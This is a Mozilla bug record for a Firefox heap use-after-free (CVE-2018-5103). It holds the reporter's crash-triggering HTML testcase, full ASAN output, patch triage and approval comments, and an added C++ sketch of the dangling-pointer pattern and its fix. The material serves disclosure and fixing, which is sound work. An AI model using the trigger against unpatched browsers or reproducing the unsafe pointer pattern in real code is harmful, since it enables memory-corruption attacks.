Closed Bug 1423159 (CVE-2018-5103) Opened 7 years ago Closed 7 years ago

heap-use-after-free in mozilla::CreateMouseOrPointerWidgetEvent

Categories

Product / Component: Core :: DOM: Events
Version: 57 Branch
Type: defect
Priority: Not set
Severity: normal

Tracking

Status: VERIFIED FIXED
Target Milestone: mozilla59

Tracking Status
firefox-esr52   58+   verified
firefox57       ---   wontfix
firefox58       +     verified
firefox59       +     verified

People

(Reporter: nils, Assigned: smaug, NeedInfo)

Details

(5 keywords, Whiteboard: [adv-main58+][adv-esr52.6+][post-critsmash-triage])

Attachments

(4 files)

The following testcase crashes a release build of Firefox 57.0.2 (SourceStamp=15bb6c3fb5875c7f39aef036dd161df1407b5ee3). It requires the fuzzPriv extension and popups enabled for the page. The cursor needs to be somewhere over the page on loading the testcase.


crash.html:
<script>
// Spin a nested event loop: the synchronous XHR blocks until the request
// fails or returns, so queued work (including the popup teardown) runs
// while the onmouseout handler is still on the stack.
function spin() {
    var x = new XMLHttpRequest();
    x.open("POST", "https://mozilla.org", false);
    try { x.send("X"); } catch (e) {}
}
function start() {
    setTimeout(fun0, 500);
}
function fun0() {
    // Install the handler that tears the popup down during dispatch, then
    // open the popup; the synthesized mouse move that follows delivers
    // mouseout to this page (see the ASAN stack below).
    o67 = document.documentElement.onmouseout = fun1;
    o123 = window.open('div.html', 'p', '');
}
function fun1() {
    o123.close();
    spin();
    // fuzzPriv comes from the fuzzing-privilege extension mentioned above;
    // forcing GC/CC here frees the node the dispatcher still references.
    fuzzPriv.GC(); fuzzPriv.CC(); fuzzPriv.GC(); fuzzPriv.CC();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==21839==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000278b30 at pc 0x7fdee55652eb bp 0x7ffdf7fefb30 sp 0x7ffdf7fefb28
READ of size 8 at 0x60d000278b30 thread T0
    #0 0x7fdee55652ea in nsCOMPtr_base::assign_with_AddRef(nsISupports*) /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:42:5
    #1 0x7fdee9fc856f in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:967:5
    #2 0x7fdee9fc856f in mozilla::CreateMouseOrPointerWidgetEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsAutoPtr<mozilla::WidgetMouseEvent>&) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:3964
    #3 0x7fdee9fc74ed in mozilla::EventStateManager::DispatchMouseOrPointerEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4008:3
    #4 0x7fdee9fc9377 in mozilla::EventStateManager::NotifyMouseOut(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4168:3
    #5 0x7fdee9fca62f in mozilla::EventStateManager::NotifyMouseOver(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4222:3
    #6 0x7fdee9fca54c in mozilla::EventStateManager::NotifyMouseOver(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4203:20
    #7 0x7fdee9faa584 in mozilla::EventStateManager::GenerateMouseEnterExit(mozilla::WidgetMouseEvent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4342:9
    #8 0x7fdee9fa511f in mozilla::EventStateManager::PreHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:732:5
    #9 0x7fdeec1aa788 in mozilla::PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8156:19
    #10 0x7fdeec1ac477 in mozilla::PresShell::HandlePositionedEvent(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7954:10
    #11 0x7fdeec1a77cd in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7751:12
    #12 0x7fdeeb9a3313 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/worker/workspace/build/src/view/nsViewManager.cpp:812:14
    #13 0x7fdeec1806e6 in mozilla::PresShell::DispatchSynthMouseMove(mozilla::WidgetGUIEvent*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3735:33
    #14 0x7fdeec194808 in mozilla::PresShell::ProcessSynthMouseMoveEvent(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:5702:12
    #15 0x7fdeec1d79a7 in mozilla::PresShell::nsSynthMouseMoveEvent::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/PresShell.h:649:16
    #16 0x7fdeec0fbf3b in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1886:12
    #17 0x7fdeec109f3e in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:337:13
    #18 0x7fdeec109f3e in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:307
    #19 0x7fdeec109a56 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:329:5
    #20 0x7fdeec10c4cb in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:770:5
    #21 0x7fdeec10c4cb in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:683
    #22 0x7fdeec107827 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:529:20
    #23 0x7fdee56dc935 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
    #24 0x7fdee56e209c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:521:10
    #25 0x7fdee645f131 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #26 0x7fdee63c387b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #27 0x7fdee63c387b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #28 0x7fdee63c387b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #29 0x7fdeeba25daf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #30 0x7fdeef1125f1 in nsAppStartup::Run() /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:288:30
    #31 0x7fdeef2f186b in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4703:22
    #32 0x7fdeef2f3463 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4867:8
    #33 0x7fdeef2f488b in XRE_main(int, char**, mozilla::BootstrapConfig const&) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4962:21
    #34 0x4ebea3 in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
    #35 0x4ebea3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:309
    #36 0x7fdf0191f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
    #37 0x41d9f8 in _start (/home/nils/fuzzer3/rel/firefox/firefox+0x41d9f8)

0x60d000278b30 is located 0 bytes inside of 136-byte region [0x60d000278b30,0x60d000278bb8)
freed by thread T0 here:
    #0 0x4bbf2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7fdee557b367 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2704:25
    #2 0x7fdee55826bb in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2892:3
    #3 0x7fdee55826bb in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3909
    #4 0x7fdee5581c03 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3730:9
    #5 0x7fdee5585950 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4299:21
    #6 0x7fdee826ab6d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1480:3
    #7 0x7fdee7dbaa4b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1434:3
    #8 0x7fdee5703f91 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7fdee6e0c610 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7fdee6e0c610 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7fdee6e0c610 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7fdee6e139aa in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:929:12
    #13 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #15 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #16 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #17 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #18 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #19 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #20 0x7fdef0228a53 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12
    #21 0x7fdee6d291ab in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #23 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #24 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #25 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #26 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #27 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #28 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #29 0x7fdef022a8db in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2965:12
    #30 0x7fdee96bc155 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7fdeea0825d5 in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7fdeea0825d5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7fdeea04c359 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1112:51
    #34 0x7fdeea04e430 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1283:20
    #35 0x7fdeea02dc31 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #36 0x7fdeea0311d2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #37 0x7fdee9fc7618 in mozilla::EventStateManager::DispatchMouseOrPointerEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4018:3

previously allocated by thread T0 here:
    #0 0x4bc27c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed88d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7fdeeb6e15a1 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7fdeeb6e15a1 in NS_NewXULElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&) /builds/worker/workspace/build/src/dom/xul/nsXULElement.cpp:268
    #4 0x7fdee829be60 in NS_NewElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsTSubstring<char16_t> const*) /builds/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:186:12
    #5 0x7fdee816b1d2 in nsDocument::CreateElementNS(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::dom::ElementCreationOptionsOrString const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:6073:8
    #6 0x7fdee96ff73a in mozilla::dom::DocumentBinding::createElementNS(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1291:59
    #7 0x7fdee9c8b1e0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3041:13
    #8 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #9 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #10 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #11 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #12 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #13 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #14 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #15 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #16 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #17 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #18 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #19 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #20 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #21 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #22 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #23 0x7fdef0228a53 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12
    #24 0x7fdee6df24a3 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1318:23
    #25 0x7fdee570567a in PrepareAndDispatch /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:120:28
    #26 0x7fdee5704656 in SharedStub (/home/nils/fuzzer3/rel/firefox/libxul.so+0x20c7656)
    #27 0x7fdeee857ac4 in nsContentTreeOwner::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsTSubstring<char16_t> const&, nsTSubstring<char> const&, bool, bool*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/xpfe/appshell/nsContentTreeOwner.cpp:933:27
    #28 0x7fdeef253d8b in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:852:24
    #29 0x7fdeef25965f in OpenWindow2 /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
    #30 0x7fdeef25965f in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #31 0x7fdee7e5d025 in nsGlobalWindow::OpenInternal(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:12959:21
    #32 0x7fdee7e5b6ff in OpenJS /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:9013:10
    #33 0x7fdee7e5b6ff in nsGlobalWindow::OpenOuter(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8975
    #34 0x7fdee7e5bb8d in nsGlobalWindow::Open(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8984:3
    #35 0x7fdee941d948 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2414:56
    #36 0x7fdee941bd65 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15530:13

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:42:5 in nsCOMPtr_base::assign_with_AddRef(nsISupports*)
Shadow bytes around the buggy address:
  0x0c1a80047110: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a80047120: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a80047130: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80047140: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1a80047150: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
=>0x0c1a80047160: fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd
  0x0c1a80047170: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1a80047180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80047190: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
  0x0c1a800471a0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c1a800471b0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==21839==ABORTING
Attached file ASAN output
Group: core-security → dom-core-security
Trying to reproduce.
Nils, so div.html isn't needed? It is just some dummy url?
So far no luck reproducing.
Flags: needinfo?(nils)
Btw, about:buildconfig nicely gives the link to hg.mozilla.org.
I see at least one issue based on code inspection.
Assignee: nobody → bugs
Ensure we keep the nodes alive long enough.

This patch is based on code inspection, since I haven't managed to reproduce the crash using the testcase.
Attachment #8935427 - Flags: review?(sshih)
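The pattern the patch description above addresses, as an added example (this is not Gecko code and not the attached patch): a dispatcher holds a raw pointer to a refcounted node, runs script, and then uses the pointer, while script tears the node down. The names Node, RefPtr, dispatchMouseOutRaw, dispatchMouseOutStrong and runScenario are assumptions chosen for this example, and the address registry s_live stands in for the role ASan played in the report, so the freed memory is never actually dereferenced.

```cpp
// Added example, not Gecko's own code. Names (Node, RefPtr, dispatchMouseOut*)
// are assumptions for illustration; s_live is a stand-in for ASan's bookkeeping.
#include <cstdint>
#include <cstdio>
#include <functional>
#include <set>
#include <string>
#include <utility>

// Registry of addresses of live Node objects. Checking it lets us detect
// "pointer refers to a freed object" without dereferencing freed memory.
static std::set<std::uintptr_t> s_live;

static std::uintptr_t key(const void* p) { return reinterpret_cast<std::uintptr_t>(p); }
bool isLive(const void* p) { return s_live.count(key(p)) != 0; }

// Minimal intrusively refcounted DOM-node stand-in (think nsIContent).
struct Node {
    std::string name;
    int refcnt = 0;
    explicit Node(std::string n) : name(std::move(n)) { s_live.insert(key(this)); }
    ~Node() { s_live.erase(key(this)); }
    void AddRef() { ++refcnt; }
    void Release() { if (--refcnt == 0) delete this; }
};

// Minimal strong-reference holder in the spirit of nsCOMPtr / RefPtr.
struct RefPtr {
    Node* p = nullptr;
    RefPtr() = default;
    explicit RefPtr(Node* n) : p(n) { if (p) p->AddRef(); }
    RefPtr(const RefPtr& o) : p(o.p) { if (p) p->AddRef(); }
    RefPtr& operator=(const RefPtr&) = delete;
    ~RefPtr() { if (p) p->Release(); }
    Node* get() const { return p; }
};

// The script handler: in the report this is the page's onmouseout (fun1),
// which closes the popup and forces GC/CC while dispatch is in progress.
using ScriptHandler = std::function<void()>;

// Vulnerable shape: raw relatedTarget kept across script execution.
// Returns true only if the node was still alive when used afterwards.
bool dispatchMouseOutRaw(Node* relatedTarget, const ScriptHandler& script) {
    script();                      // arbitrary JS runs; may drop the last reference
    return isLive(relatedTarget);  // real code would dereference here: the UAF
}

// Fixed shape: hold a strong reference for the duration of the dispatch.
bool dispatchMouseOutStrong(Node* relatedTarget, const ScriptHandler& script) {
    RefPtr keepAlive(relatedTarget);  // extra ref survives whatever script does
    script();
    return isLive(keepAlive.get());   // still alive here; released on return
}

// Scenario: the "document" holds the only reference to the popup's node, and
// the script handler drops it mid-dispatch. Returns the dispatcher's verdict.
bool runScenario(bool (*dispatcher)(Node*, const ScriptHandler&)) {
    RefPtr* documentRef = new RefPtr(new Node("popup-content"));
    Node* raw = documentRef->get();
    ScriptHandler closeAndCollect = [&]() {
        delete documentRef;   // window.close() + GC/CC: document-side ref gone
        documentRef = nullptr;
    };
    bool alive = dispatcher(raw, closeAndCollect);
    delete documentRef;       // no-op if script already tore it down
    return alive;
}

int main() {
    std::printf("raw pointer across script: %s\n",
                runScenario(dispatchMouseOutRaw) ? "alive" : "USE-AFTER-FREE");
    std::printf("strong ref across script:  %s\n",
                runScenario(dispatchMouseOutStrong) ? "alive" : "USE-AFTER-FREE");
    return 0;
}
```

The only difference between the two dispatchers is the strong reference taken before script runs, which is the shape of fix the patch description calls "keeping objects alive a tad longer"; everything else about the call sequence is identical.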
Olli, yes it's not needed. Works without div.html from file: and http:.

about:buildconfig for some reason doesn't have the link on the treeherder asan builds :-/
Flags: needinfo?(nils)
Attachment #8935427 - Flags: review?(sshih) → review+
Comment on attachment 8935427 [details] [diff] [review]
esm_relatedTarget_crash.diff

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
It does pinpoint where the issue is, but triggering it might not be that easy.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be
-m "Bug 1423159, ensure proper multiprocess mouse enter/exit handling, r=stone"

Which older supported branches are affected by this flaw?
I guess all, but depends on e10s being enabled.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
About to rebase for 52

How likely is this patch to cause regressions; how much testing does it need?
Very unlikely. Just keeping objects alive a tad longer

The fix is based on code inspection.
Attachment #8935427 - Flags: sec-approval?
Attachment #8935427 - Flags: approval-mozilla-beta?
[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration:
See comment 8
User impact if declined:
security sensitive crashes 
Fix Landed on Version:
not yet
Risk to taking this patch (and alternatives if risky): 
should be very safe

String or UUID changes made by this patch: 
NA
Attachment #8935726 - Flags: approval-mozilla-esr52?
Comment on attachment 8935427 [details] [diff] [review]
esm_relatedTarget_crash.diff

Giving sec-approval+ and approval for beta.
Attachment #8935427 - Flags: sec-approval?
Attachment #8935427 - Flags: sec-approval+
Attachment #8935427 - Flags: approval-mozilla-beta?
Attachment #8935427 - Flags: approval-mozilla-beta+
https://hg.mozilla.org/mozilla-central/rev/689357a93948
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
Group: dom-core-security → core-security-release
Comment on attachment 8935726 [details] [diff] [review]
